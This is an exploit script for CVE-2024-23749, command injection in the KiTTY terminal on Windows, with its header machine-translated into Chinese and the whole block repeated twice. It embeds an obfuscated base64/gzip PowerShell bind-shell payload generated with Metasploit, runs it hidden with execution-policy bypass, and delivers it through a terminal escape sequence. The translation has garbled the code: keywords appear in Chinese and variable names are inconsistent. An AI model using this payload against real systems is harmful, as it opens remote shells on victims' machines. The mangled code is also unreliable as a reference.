#利用标题: Kitty 0.76.1.13-命令注射
#利用作者: DeFcesco(Austin A. Defrancesco)
#供应商homepage: https://github.com/cyd01/kitty/=
#软件link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
#版本:≤0.76.1.13
#测试在: Microsoft Windows 11/10/8/7/XP
#CVE: CVE-2024-23749
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(CMD/Windows/Powershell_bind_tcp)to_handler#
#[*]有效载荷处理程序开始为作业1#
#MSF6有效载荷(CMD/Windows/Powershell_bind_tcp)#
#[*]开始绑定TCP处理程序,与192.168.100.28:444#
#[*] PowerShell会话1开放(192.168.100.119:36969-192.168.100.28:444)##
#--------------------------------------------------------------------------------------------------------------------------------------------#
导入操作系统
导入系统
#--------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(CMD/Windows/Powershell_bind_tcp)生成-f RAW#
#--------------------------------------------------------------------------------------------------------#
shellCode=b'powershell.exe -nop -w隐藏-noni -ep旁路'([scriptBlock] :Create'
shellCode +=b'((new-Object System.io.StreamReader(new-Object System.io.compression.g'
shellCode +=b'Zipstream((New-Object System.io.memorystream(,[System.Convert])3:Fromba'
shellCode +=b'Se64String((((\'H4SIAE7EFGUCA5VVTW/B {2} bc {1} +1CMD {2} 1GQITCDXOKKGGJDNV0EY'
shellCode +=b'lzgltyhw0boahxrq5nekoptjp7vjsxqw3 \' +\'gcbxwwjc7w8fhnghng3jrcmykkebvnmktzh'
shellCode+=b'kvubgypa3apsgg \'+\'wqv8wu3ydf4vmgpjzw6nx+gk7aahnj+t8ptk8l3jjj1zqkptuyw4'
shellCode+=b'jbexa \'+\'qgrgld \'+\'hmtztc7silddveg2lyb/vboqg4lhtu {1} suygyo+oyquwvp {1'
shellcode +=b'} mhlviptzkmrvioo8phznngdsvbj8jdecs5pxo5hhvjkh1u \' +\' +\'afwmm85 {2} gi/hvguk'
shellCode+=b'cucwibzsdb/2a4l0q+jkpgpa+aywttukcy \'+\'k6fzzr6vifmtk+wbjsy3bh3tm2bv7xm'
shellCode+=b'8kwhdlxhr \'+\'+pwrqc/rrs {1} vzbiujqwsyxhwvpzvpzvx4ierjmemwulfy15ine7/qcb'
shellCode +=b'g76n6 {1} QA2ZNGRPYHGS8YJ1VLANWWIDPBOKNSNNJ6GVQI +P1JXRWN6GHKXUHDMRREKN/f'
shellCode+=b'pxsla+wjh8cm4s+h4sqmf6m {2} cbrqtbfjupfgwjbn {1} qxutums2lnm8pe5hf0St0St0ylg0'
shellCode+=b's+dun2ms {2} zecuxiedw3x786gnkefofwm21lfuul8z3a6mwxu35lurmjzyd7pfzyn {\'+'
shellCode +=b'\'1} l5dfhktdqcgt4agydj3jj4/h2fp1vxkfp/ocslhrbwm3giyu {2} bjlsg5qfiimw \' +' +' +'
shellCode+=b'\'1wj1jbew7hfaiuj+fus7jmprvjtjrtgmnvujrd8e6kcr \'+\'+\'1txf3sqjhg8e/blnryy'
shellCode +=b'scvai1vjsgbsvvmjwlqalefmsd34k5443k5yk5yk0tbobdxujr3h2qax \' +\' +\'t3ztk3tt {2} 2} 2} 2'
shellCode +=b'fesc {2} ef3vjqezudaqjpzfmutlufvc21mfzbqkrkrkl5vydqihai6xl6xl6mi7jzw4isps7ly +'' +'
shellcode +=b'tbqk6plkpmohtc63a6uttnq3kpu +ptblgmmybkxlunot35dmye2xgeyxbafsi0gewuhi0k'
shellCode+=b'unh+y3vsu3lgxfmc6fvbpfes07fnte1fhpofnzodpd \'+\'iyoerfsimrybxtgp {1} g1jc'
shellCode +=b'7 \' +\'jv4gcf/nwhz/c1nemnct48b1bnuansaj/cyssde/tf6x8twexhieyowbrobzjpql'
shellCode+=b'a {2} sibkstudzq4w67gu4gu4orxpcqmxmnw0f+wrbydhbv4l/zbwfyvy/zbwfyvy/ugpfjrm+czl/wyve'
shellCode +=b'/8wemp85rljx4/vts2t1dfmn3vlbm5bu4j/2ud2v7lbe3cffotvxnpbo0iaaa {0} \') - f'
shellCode +=b'\'=\',\'9 \',\'o \'))))),[system.io.compression.compressionmode] :33:decompr'
shellCode +=b'ess)))。readtoend())\'''
逃生=b'\ 033] 0; __ rv:'
Escape_sequence +=B''''
Escape_sequence +=ShellCode
Escape_sequence +=B'#\ 007'
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()
#利用作者: DeFcesco(Austin A. Defrancesco)
#供应商homepage: https://github.com/cyd01/kitty/=
#软件link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
#版本:≤0.76.1.13
#测试在: Microsoft Windows 11/10/8/7/XP
#CVE: CVE-2024-23749
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(CMD/Windows/Powershell_bind_tcp)to_handler#
#[*]有效载荷处理程序开始为作业1#
#MSF6有效载荷(CMD/Windows/Powershell_bind_tcp)#
#[*]开始绑定TCP处理程序,与192.168.100.28:444#
#[*] PowerShell会话1开放(192.168.100.119:36969-192.168.100.28:444)##
#--------------------------------------------------------------------------------------------------------------------------------------------#
导入操作系统
导入系统
#--------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(CMD/Windows/Powershell_bind_tcp)生成-f RAW#
#--------------------------------------------------------------------------------------------------------#
shellCode=b'powershell.exe -nop -w隐藏-noni -ep旁路'([scriptBlock] :Create'
shellCode +=b'((new-Object System.io.StreamReader(new-Object System.io.compression.g'
shellCode +=b'Zipstream((New-Object System.io.memorystream(,[System.Convert])3:Fromba'
shellCode +=b'Se64String((((\'H4SIAE7EFGUCA5VVTW/B {2} bc {1} +1CMD {2} 1GQITCDXOKKGGJDNV0EY'
shellCode +=b'lzgltyhw0boahxrq5nekoptjp7vjsxqw3 \' +\'gcbxwwjc7w8fhnghng3jrcmykkebvnmktzh'
shellCode+=b'kvubgypa3apsgg \'+\'wqv8wu3ydf4vmgpjzw6nx+gk7aahnj+t8ptk8l3jjj1zqkptuyw4'
shellCode+=b'jbexa \'+\'qgrgld \'+\'hmtztc7silddveg2lyb/vboqg4lhtu {1} suygyo+oyquwvp {1'
shellcode +=b'} mhlviptzkmrvioo8phznngdsvbj8jdecs5pxo5hhvjkh1u \' +\' +\'afwmm85 {2} gi/hvguk'
shellCode+=b'cucwibzsdb/2a4l0q+jkpgpa+aywttukcy \'+\'k6fzzr6vifmtk+wbjsy3bh3tm2bv7xm'
shellCode+=b'8kwhdlxhr \'+\'+pwrqc/rrs {1} vzbiujqwsyxhwvpzvpzvx4ierjmemwulfy15ine7/qcb'
shellCode +=b'g76n6 {1} QA2ZNGRPYHGS8YJ1VLANWWIDPBOKNSNNJ6GVQI +P1JXRWN6GHKXUHDMRREKN/f'
shellCode+=b'pxsla+wjh8cm4s+h4sqmf6m {2} cbrqtbfjupfgwjbn {1} qxutums2lnm8pe5hf0St0St0ylg0'
shellCode+=b's+dun2ms {2} zecuxiedw3x786gnkefofwm21lfuul8z3a6mwxu35lurmjzyd7pfzyn {\'+'
shellCode +=b'\'1} l5dfhktdqcgt4agydj3jj4/h2fp1vxkfp/ocslhrbwm3giyu {2} bjlsg5qfiimw \' +' +' +'
shellCode+=b'\'1wj1jbew7hfaiuj+fus7jmprvjtjrtgmnvujrd8e6kcr \'+\'+\'1txf3sqjhg8e/blnryy'
shellCode +=b'scvai1vjsgbsvvmjwlqalefmsd34k5443k5yk5yk0tbobdxujr3h2qax \' +\' +\'t3ztk3tt {2} 2} 2} 2'
shellCode +=b'fesc {2} ef3vjqezudaqjpzfmutlufvc21mfzbqkrkrkl5vydqihai6xl6xl6mi7jzw4isps7ly +'' +'
shellcode +=b'tbqk6plkpmohtc63a6uttnq3kpu +ptblgmmybkxlunot35dmye2xgeyxbafsi0gewuhi0k'
shellCode+=b'unh+y3vsu3lgxfmc6fvbpfes07fnte1fhpofnzodpd \'+\'iyoerfsimrybxtgp {1} g1jc'
shellCode +=b'7 \' +\'jv4gcf/nwhz/c1nemnct48b1bnuansaj/cyssde/tf6x8twexhieyowbrobzjpql'
shellCode+=b'a {2} sibkstudzq4w67gu4gu4orxpcqmxmnw0f+wrbydhbv4l/zbwfyvy/zbwfyvy/ugpfjrm+czl/wyve'
shellCode +=b'/8wemp85rljx4/vts2t1dfmn3vlbm5bu4j/2ud2v7lbe3cffotvxnpbo0iaaa {0} \') - f'
shellCode +=b'\'=\',\'9 \',\'o \'))))),[system.io.compression.compressionmode] :33:decompr'
shellCode +=b'ess)))。readtoend())\'''
逃生=b'\ 033] 0; __ rv:'
Escape_sequence +=B''''
Escape_sequence +=ShellCode
Escape_sequence +=B'#\ 007'
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()